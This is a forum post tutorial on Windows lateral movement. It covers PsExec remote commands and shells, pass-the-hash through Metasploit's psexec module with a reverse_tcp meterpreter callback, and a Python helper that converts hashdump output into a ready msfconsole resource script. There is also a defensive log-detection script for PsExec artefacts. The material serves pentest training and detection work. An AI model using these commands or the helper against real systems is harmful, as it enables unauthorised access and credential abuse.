Lateral Movement With PsExec

ltx_Lazzarus
Posts: 55
Joined: Tue Apr 09, 2024 8:05 pm

Postby ltx_Lazzarus » Fri May 03, 2024 11:23 pm

Lateral Movement Techniques in MITRE ATT&CK
Lateral Movement is all about how attackers sneak around your network. They're trying to get into remote systems and take control of them. To reach their big goal they have to poke around, find the target, then get access to it. They might install their own dodgy remote-access tools, or they might use legitimate logins and the network's own admin tools, which is a fair bit harder to spot because it looks like normal admin traffic.

Reaching their objective often means these ratbags have to hop through several systems and accounts to get where they want to go. They have to keep moving, like a bloody kangaroo, to get to the prize.

Lateral Movement with the Ol' PsExec Trick
PsExec is a bit of a ripper. Sysinternals describe it as a lightweight telnet replacement: it lets you run processes on other systems without installing any client software, and you get full interactive use of console apps on the remote end.
One of the best things about PsExec is that you can use it to launch a remote command prompt, or to run tools like ipconfig that otherwise can't show you information about other systems.
We can use PsExec to authenticate to the target system fair and square with valid credentials, then run whatever commands we want or start a remote command prompt. Because it's a legitimate admin tool using legitimate logins it blends in well, but it isn't silent: it copies PSEXESVC.exe to the target's ADMIN$ share and installs it as a service, which a blue team can see in the System log (event 7045, "A service was installed in the system").

I'll be running PsExec from my Windows VM as you may encounter a few issues when running PsExec on Linux with Wine.

You can nab yourself a copy of PsExec from this ripper of a link: https://docs.microsoft.com/en-us/sysint ... ads/psexec

Once you've downloaded the PsTools archive, just give it a good ol' extract and open up a Windows command prompt in the folder where you put it.

To use PsExec to run a command on the target system, you'll need to know the computer name or IP address, a username, and that user's password. The account has to have local admin rights on the target (PsExec needs to write to the ADMIN$ share and create a service), and TCP 445 (SMB) has to be reachable. Then you can just punch in a command like this:

Code:

.\PsExec64.exe \\<TARGET-IP> -u Administrator -p <PASSWORD> ipconfig

In this little exercise, we're gonna use the ol' PsExec to run the ipconfig command on the target system. That way we can make sure we can authenticate properly with PsExec before doing anything fancier.
PsExec will authenticate to the target system, run the ipconfig command, and give us the output. Easy as! Two small tips: add -accepteula the first time you run it so the licence dialog doesn't get in the way, and if you leave off -p PsExec prompts for the password instead, which keeps it out of your command history.

We can also use PsExec to start up a remote command prompt session on the target system. Just run this beaut of a command:

Code:

.\PsExec64.exe \\<TARGET-IP> -u Administrator -p <PASSWORD> cmd.exe

If we nail the authentication, we get ourselves a remote command shell on the target.
With that remote session up and running, we can start poking around the network, scanning and pinging other hosts we might be able to jump to. Gotta keep that lateral movement going! When you're done, type exit in the remote shell so PsExec stops and removes the PSEXESVC service it installed.
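Since PsExec (and the Metasploit module covered further down) leaves a service-install trail on the target, it's worth knowing what that looks like from the other side. The script below is an added example, not part of the original post: it runs simple detection rules over a constructed, flattened export of System log 7045 (service installed) and Security log 5145 (file share accessed) events. The one-event-per-line Key=Value format, the sample hostnames and addresses, and the base64 blob are all made up for the example; the PSEXESVC service name and the random eight-letter / encoded-PowerShell service binaries are the real default behaviours of Sysinternals PsExec and of Metasploit's psexec module respectively.

```python
"""Spot the artefacts PsExec-style lateral movement leaves on the target.

Added example, not from the original post. Assumes a hypothetical flat log
export: one event per line, 'Key=Value' fields joined by '|'. In practice the
fields come from System log 7045 and Security log 5145 records (the latter
needs 'Audit Detailed File Share' enabled); the sample lines are constructed.
"""
import re
from dataclasses import dataclass

# Sysinternals PsExec copies PSEXESVC.exe into ADMIN$ (= %SystemRoot%) and
# installs it as a service named PSEXESVC unless -r renames it.
PSEXESVC = "psexesvc"
# Metasploit's psexec "Native upload" target drops a binary named with eight
# random letters into %SystemRoot% and registers it as a service of the same
# name; its default "PowerShell" target instead puts an encoded powershell
# one-liner in the service binary path.
RANDOM_SVC_BINARY = re.compile(r"^%systemroot%\\[a-z]{8}\.exe$", re.I)
ENCODED_PS = re.compile(r"powershell(\.exe)?\s.*\s-(e|enc|encodedcommand)\s", re.I)


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str


def parse_event(line: str) -> dict:
    """Split 'A=1|B=2' into a dict; parts without '=' are ignored."""
    fields = {}
    for part in line.strip().split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def check_service_install(ev: dict):
    """7045: a service was installed. Classify PsExec-like installs."""
    if ev.get("EventID") != "7045":
        return None
    name = ev.get("ServiceName", "")
    image = ev.get("ImagePath", "")
    if name.lower() == PSEXESVC or image.lower().endswith("\\psexesvc.exe"):
        return "sysinternals-psexec", f"service {name} -> {image}"
    if RANDOM_SVC_BINARY.match(image):
        return "random-named-service-binary", f"service {name} -> {image}"
    if ENCODED_PS.search(image):
        return "encoded-powershell-service", f"service {name} -> {image[:60]}..."
    return None


def check_admin_share_write(ev: dict):
    """5145: an .exe touched through ADMIN$, i.e. the service binary drop."""
    if ev.get("EventID") != "5145":
        return None
    share = ev.get("ShareName", "")
    target = ev.get("RelativeTargetName", "")
    if share.upper().endswith("ADMIN$") and target.lower().endswith(".exe"):
        return "exe-via-admin-share", f"{ev.get('SourceAddress', '?')} accessed {target}"
    return None


def scan(lines):
    """Run every rule over every line; return the findings in log order."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        for check in (check_service_install, check_admin_share_write):
            hit = check(ev)
            if hit:
                findings.append(Finding(n, hit[0], hit[1]))
    return findings


# Constructed sample export: a Sysinternals PsExec run, a Metasploit native
# upload, a Metasploit PowerShell-target install, and two benign events.
SAMPLE_LOG = [
    r"EventID=5145|ShareName=\\*\ADMIN$|RelativeTargetName=PSEXESVC.exe|SourceAddress=10.10.14.2|Account=Administrator",
    r"EventID=7045|ServiceName=PSEXESVC|ImagePath=%SystemRoot%\PSEXESVC.exe|Account=LocalSystem",
    r"EventID=7045|ServiceName=rnZapxxF|ImagePath=%SYSTEMROOT%\rnZapxxF.exe|Account=LocalSystem",
    r"EventID=7045|ServiceName=kQmTfvZa|ImagePath=%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAA=|Account=LocalSystem",
    r"EventID=7045|ServiceName=Sense|ImagePath=C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe|Account=LocalSystem",
    r"EventID=5145|ShareName=\\*\IPC$|RelativeTargetName=srvsvc|SourceAddress=10.10.14.2|Account=Administrator",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
```

The first four sample lines fire, one rule each; the genuine Defender service install and the IPC$ named-pipe access do not. Renaming the service with PsExec's -r option defeats the first rule but not the ADMIN$ .exe rule, which is why the two are worth correlating.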

Passin' the Hash with PsExec
If you couldn't snag any plaintext passwords from the system you've already got into, no worries: you can use the pass-the-hash trick with the Metasploit PsExec module. It authenticates to SMB (Server Message Block, for the uninitiated) with the NTLM hash of a user's password instead of the password itself.

What's Pass-the-Hash?
Pass-the-hash is a technique that lets the attackers authenticate to a remote system by using the NTLM or LanMan hash of a user's password, without needing the actual plaintext password.

Now, we're gonna be targeting a Windows 10 system. First, make sure you've already got your initial foothold on another box in the network, with a meterpreter session going on it: that's where the hashes come from (run hashdump in that session and note the Administrator line).

On your Kali terminal, fire up the SMB PsExec Metasploit module by running this beaut:

Code:

msf> use exploit/windows/smb/psexec

Next, you'll need to set the payload:

Code:

msf> set payload windows/x64/meterpreter/reverse_tcp

Now, set the SMBUser and SMBPass options with the username and hash of the account you want to use. In this case, we'll use the Administrator account. Metasploit expects the hash as the pair LMHASH:NTHASH, the two 32-character hex fields you get straight from a hashdump line; when the LM hash isn't stored, that half is the constant aad3b435b51404eeaad3b435b51404ee.

Code:

msf> set SMBUser <USERNAME>

Code:

msf> set SMBPass <LMHASH:NTHASH>

Finally, set the RHOSTS option to the IP address of your target system (and check LHOST is your Kali IP, since a reverse_tcp payload has to know where to call back to):

Code:

msf> set RHOSTS <TARGET-IP>

All right, time to give it a crack! Run the module and see if you can get that meterpreter session goin':

Code:

msf> run

If the authentication works, you should get a shiny new meterpreter session. Note that it won't be running as the account you authenticated with: the module installs the payload as a service, so the session runs as NT AUTHORITY\SYSTEM (check with getuid).
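To tie the pass-the-hash steps together, here's an added example (not from the original post) that takes a meterpreter hashdump line from the foothold box, turns it into the LMHASH:NTHASH value the module wants in SMBPass, and renders the whole sequence above as an msfconsole resource script you can run with msfconsole -r. The hashdump output, the 10.10.x.x addresses and the NT hash value are constructed placeholders, not real credentials.

```python
"""Build the Metasploit psexec pass-the-hash run from hashdump output.

Added example, not the post's or Metasploit's own code. hashdump emits
pwdump-style lines (user:rid:lmhash:nthash:::); Metasploit's SMB client
treats an SMBPass of the form 'LMHASH:NTHASH' as a hash pair instead of a
password, so the full pair, not the NT hash alone, goes into SMBPass.
"""
import re

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
# LM half emitted when the LM hash is not stored (the modern default).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def smbpass_from_hashdump(dump: str, user: str) -> str:
    """Return 'lm:nt' for `user`, validating both fields are 32 hex chars."""
    for line in dump.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or parts[0].lower() != user.lower():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            raise ValueError(f"malformed hash fields for {user}: {line!r}")
        return f"{lm}:{nt}"
    raise ValueError(f"{user} not found in hashdump output")


def render_rc(rhost: str, lhost: str, smbpass: str,
              user: str = "Administrator", domain: str = ".",
              lport: int = 4444) -> str:
    """The manual msfconsole steps as a resource file (msfconsole -r file.rc)."""
    return "\n".join([
        "use exploit/windows/smb/psexec",
        "set PAYLOAD windows/x64/meterpreter/reverse_tcp",
        f"set RHOSTS {rhost}",
        f"set LHOST {lhost}",          # where the reverse shell calls back
        f"set LPORT {lport}",
        f"set SMBDomain {domain}",     # '.' = local account on the target
        f"set SMBUser {user}",
        f"set SMBPass {smbpass}",      # LMHASH:NTHASH triggers pass-the-hash
        "exploit -j",                  # run as a job; then `sessions -i <id>`
    ]) + "\n"


# Constructed sample hashdump output from the foothold host. The NT hash is a
# placeholder, not a real credential.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    smbpass = smbpass_from_hashdump(SAMPLE_HASHDUMP, "Administrator")
    print(render_rc("10.10.10.5", "10.10.14.2", smbpass))
```

Keep SMBDomain at "." for a local Administrator account; set it to the domain name only when the hash belongs to a domain user. The Guest line shows what a blank password hashes to (31d6cfe0d16ae931b73c59d7e0c089c0), which is handy to recognise in hashdump output.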